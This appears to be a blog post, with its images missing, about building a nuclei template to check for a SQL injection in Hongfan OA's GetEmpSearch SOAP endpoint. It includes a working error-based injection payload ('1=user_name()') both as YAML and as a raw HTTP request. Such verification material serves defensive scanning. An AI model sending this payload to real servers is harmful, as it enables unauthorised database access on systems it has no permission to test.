Background
2. Project address
3. Auto-generating the YAML + quick verification in the browser
id: hongfansql
info:
  name: 红帆oa Sql注入
  author: fkalis
  severity: high
  reference: https://blog.csdn.net/qq_41904294/article/details/132365842
http:
  - method: POST
    path:
      - "{{BaseURL}}/iOffice/prg/set/wss/udfmr.asmx"
    headers:
      Content-Type: text/xml; charset=utf-8
      SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"
    body: |
      <?xml version="1.0" encoding="utf-8"?>
      <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body>
          <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
            <condition>1=user_name()</condition>
          </GetEmpSearch>
        </soap:Body>
      </soap:Envelope>
    matchers:
      # Add your desired matcher(s) here, for example:
      - type: word
        words:
          - "SqlException"
        part: body
      - type: status
        status:
          - 500
There is an error:
After modification:
Run the PoC to see the result
Vulnerability reproduction check
POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
      <condition>1=user_name()</condition>
    </GetEmpSearch>
  </soap:Body>
</soap:Envelope>
http://xxx.xxx.xxxx:9980/ioffice/
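Run the PoC:
Quick vulnerability verification using the browser
Request packet
Response packet
3. Sharing a nuclei AI PoC
Visit the shared link to get the PoC.
You can, of course, also turn off sharing for the PoC.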